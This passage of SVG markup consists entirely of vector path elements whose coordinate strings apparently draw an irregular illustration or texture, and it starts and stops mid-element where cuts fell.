d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path 